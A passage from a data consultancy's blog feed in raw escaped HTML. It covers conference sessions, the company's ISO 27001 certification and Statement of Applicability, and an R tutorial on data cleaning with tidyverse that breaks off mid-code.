&lt;h3 id="activities-to-reach-a-broader-audience-rss-ambassadors-tips-for-communicating-statistics"&gt;Activities to reach a broader audience: RSS Ambassadors&amp;rsquo; tips for communicating statistics&lt;/h3&gt;
&lt;p&gt;Communication is a big part of what we do at Jumping Rivers. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=66676&amp;s=2331" rel="external"&gt;session&lt;/a&gt;, Rhian and the other RSS Statistical Ambassadors will be sharing their tips and tricks for communicating statistical concepts. This interactive session will give audience members an opportunity to practice their communication skills.&lt;/p&gt;
&lt;h3 id="getting-your-work-to-work"&gt;Getting your work to work&lt;/h3&gt;
&lt;p&gt;On Wednesday 6th September, Rhian will be taking part in the panel on &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=66692&amp;s=3000" rel="external"&gt;getting your work to work&lt;/a&gt;, talking about cleaning up messy code. She&amp;rsquo;ll share actionable tips to help you refactor your code and make it easier for collaborators to work with it.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/royal-statistical-society-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Our ISO 27001 Certification</title><link>https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/</link><pubDate>Thu, 24 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hello from the Jumping Rivers team! Today, we&amp;rsquo;re taking a moment to chat about our recent achievement – becoming ISO certified.&lt;/p&gt;
&lt;h3 id="what-is-iso-27001-and-why-does-it-matter"&gt;What is ISO 27001 and Why Does It Matter?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.iso.org/standard/27001" rel="external"&gt;ISO 27001&lt;/a&gt; is an internationally recognised standard for information security management systems (ISMS). It provides a systematic approach to managing sensitive company information, ensuring its confidentiality, integrity, and availability. The standard outlines a framework that helps organisations identify and manage information security risks, implement appropriate controls, and continuously improve their security posture.&lt;/p&gt;
&lt;p&gt;In today&amp;rsquo;s digitally driven world, where data breaches and cyberattacks are rampant, ISO 27001 offers a proactive approach to safeguarding sensitive information. It not only helps companies protect their own data but also builds trust with clients, partners, and stakeholders by demonstrating a commitment to maintaining robust information security practices.&lt;/p&gt;
&lt;h3 id="why-we-chose-the-iso-path"&gt;Why We Chose the ISO Path&lt;/h3&gt;
&lt;p&gt;A couple of reasons nudged us towards these certifications:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The clients we interact with often required them.&lt;/li&gt;
&lt;li&gt;It presented a brilliant opportunity for a bit of introspection. Were our current security practices up to scratch? We were keen to find out.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-iso-27001-certification-cyber-security-management"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="our-route-to-certification"&gt;Our Route to Certification&lt;/h3&gt;
&lt;p&gt;While it was an enlightening six months, it wasn&amp;rsquo;t without its hurdles. We had to sift through our security practices and ensure they were robust. The real task, however, was fostering a company-wide understanding that security isn&amp;rsquo;t just an IT department&amp;rsquo;s concern – it&amp;rsquo;s everyone&amp;rsquo;s business.
We enlisted the help of a consultant who really knew their stuff. They guided us through the intricacies of the ISO standards, ensuring we were on the right track.&lt;/p&gt;
&lt;h3 id="the-statement-of-applicability-an-analogy"&gt;The Statement of Applicability: An Analogy&lt;/h3&gt;
&lt;p&gt;Personally, my favourite exercise in the standard is the Statement of Applicability (SoA).
Think of the SoA in the context of building a house. Imagine you&amp;rsquo;re constructing a new home and you want it to be safe and secure for your family. You wouldn&amp;rsquo;t just randomly choose security measures; you&amp;rsquo;d assess the risks, identify potential vulnerabilities, and then decide which security features to include.&lt;/p&gt;
&lt;p&gt;Similarly, the Statement of Applicability is like the blueprint for securing your organisation&amp;rsquo;s digital &amp;ldquo;house.&amp;rdquo; It&amp;rsquo;s a crucial component of ISO 27001 implementation. The SoA lists the specific controls from the ISO 27001 standard that your organisation has chosen to implement based on its unique risk profile. These controls act as the security measures that protect your sensitive information. Just as you wouldn&amp;rsquo;t install an alarm system in your home if you live in a crime-free neighbourhood, you wouldn&amp;rsquo;t implement certain controls if they aren&amp;rsquo;t relevant to your organisation&amp;rsquo;s operations and risks.&lt;/p&gt;
&lt;p&gt;The SoA ensures that your information security efforts are targeted, effective, and aligned with your business objectives. It&amp;rsquo;s a dynamic document that evolves as your organisation grows, risks change, and technology advances. Just as you might update your home security system as new threats emerge, you&amp;rsquo;ll revise your Statement of Applicability to adapt to evolving cybersecurity challenges.&lt;/p&gt;
&lt;p&gt;An example of a control we’ve excluded from our Statement of Applicability is &amp;ldquo;Cabling Security,&amp;rdquo; which pertains to safeguarding power and telecommunications cabling carrying data or supporting information services. This control emphasises protection against interception, interference, or damage to physical cabling infrastructure.&lt;/p&gt;
&lt;p&gt;Our decision to exclude this control stems from our company&amp;rsquo;s primary mode of operation, which is rooted in remote work and cloud-based infrastructure. Given that we extensively leverage major cloud providers for our server architecture, our reliance on physical on-site cabling is significantly limited. The inherent nature of cloud-based systems means that the responsibility for cabling security largely falls under the purview of these established providers.&lt;/p&gt;
&lt;p&gt;By creating a well-thought-out Statement of Applicability, you&amp;rsquo;re essentially tailoring your security &amp;ldquo;blueprint&amp;rdquo; to fit your organisation&amp;rsquo;s needs, making your ISO 27001 implementation not just a compliance exercise, but a strategic decision that aligns with your business goals and risk appetite.&lt;/p&gt;
&lt;h3 id="the-post-certification-landscape"&gt;The Post-Certification Landscape&lt;/h3&gt;
&lt;p&gt;Since waving our ISO certificates about:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We&amp;rsquo;ve noticed more of a focus on processes across the company. They have become clearer and more streamlined. It&amp;rsquo;s less winging it, and more standardised and easy to follow instructions.&lt;/li&gt;
&lt;li&gt;The procurement process with clients? It&amp;rsquo;s been smoother sailing. That certification tends to be the seal of approval many are looking for.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="staying-the-course"&gt;Staying the Course&lt;/h3&gt;
&lt;p&gt;We&amp;rsquo;re not ones to become complacent. We have a risk treatment plan in place to implement over the coming year up to our next audit, as well as regular internal audits on the horizon, so we&amp;rsquo;re all set to keep our standards sky-high.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Best Practices for Data Cleaning and Preprocessing</title><link>https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/</link><pubDate>Thu, 17 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As data scientists, we often find ourselves immersed in a vast sea of
data, trying to extract valuable insights and hidden patterns. However,
before we embark on the journey of data analysis and modeling, we must
first navigate the crucial steps of data cleaning and preprocessing. In
this blog post, we will explore the significance of data cleaning and
preprocessing in data science workflows and provide practical tips and
techniques to handle missing data, outliers, and data inconsistencies
effectively.&lt;/p&gt;
&lt;h3 id="why-data-cleaning-and-preprocessing-matter"&gt;Why Data Cleaning and Preprocessing Matter?&lt;/h3&gt;
&lt;p&gt;Data cleaning and preprocessing are fundamental steps in the data
science process. High-quality data is essential for accurate analysis
and modeling.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Improved Accuracy:&lt;/strong&gt; Incomplete data can lead to biased results and
inaccurate models.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Better Insights:&lt;/strong&gt; Preprocessed data reveals more profound insights,
patterns, and trends. Removing noise allows us to focus on the
meaningful aspects of the data.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Model Performance:&lt;/strong&gt; Machine learning models rely on clean data.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this blog, we’ll embark on a journey of data processing with the R
programming language. To navigate this journey, the
&lt;a href="https://www.tidyverse.org/" rel="external"&gt;{tidyverse}&lt;/a&gt; package, a powerhouse of
interconnected tools, will allow us to efficiently examine our data.
Let’s dive into the world of R and witness the magic of turning raw data
into meaningful insights.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Load in the Required Packages&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install and load the tidyverse package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyverse)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(janitor)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;Create or load your data&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alice&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bob&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Amber&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Fred&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Eve&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;25&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;31&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;23&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Male&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Male&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;80&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;91&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;87&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;77&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jenny&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Dave&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;11&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Male&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;70&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 5 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name Age gender Score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber NA &amp;lt;NA&amp;gt; 87&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve NA Female NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name Age gender Score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 6 Jenny 29 Female 40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="addressing-data-inconsistencies"&gt;Addressing Data Inconsistencies:&lt;/h3&gt;
&lt;p&gt;Suppose the dataset combines data from different sources, which are
stored differently. We can standardise these inconsistencies as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Standardisation:&lt;/strong&gt; We can standardise the names to follow a
consistent format. For example below, the column names “Age” and
“Score” have been standardised to “age” and “score” in the dataframe.
This lowercase naming convention is consistent with the other column
names.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_names&lt;/span&gt;(df_1)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_names&lt;/span&gt;(df_2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 5 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber NA &amp;lt;NA&amp;gt; 87&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve NA Female NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 6 Jenny 29 Female 40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Integration:&lt;/strong&gt; When combining data from multiple sources,
ensure that all data fields align correctly.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s combine the data frames &lt;code&gt;df_1&lt;/code&gt; and &lt;code&gt;df_2&lt;/code&gt; vertically by stacking
their rows on top of each other to create a unified data frame, &lt;code&gt;df&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bind_rows&lt;/span&gt;(df_1, df_2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber NA &amp;lt;NA&amp;gt; 87&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve NA Female NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-best-practices-data-cleaning"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="managing-outliers"&gt;Managing Outliers:&lt;/h3&gt;
&lt;p&gt;Let’s assume that there are some extreme outliers in the dataset. We can
deal with outliers as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Visual Inspection:&lt;/strong&gt; Plotting a scatter plot may reveal outliers as
data points far away from the general trend. We can visually inspect
these data points and decide how to deal with them. Deletion of
outliers is only recommended when the data point is seen as a
data-entry mistake, rather than unusual. However, getting the record
corrected would be a better solution!&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(df, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; age, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; score)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
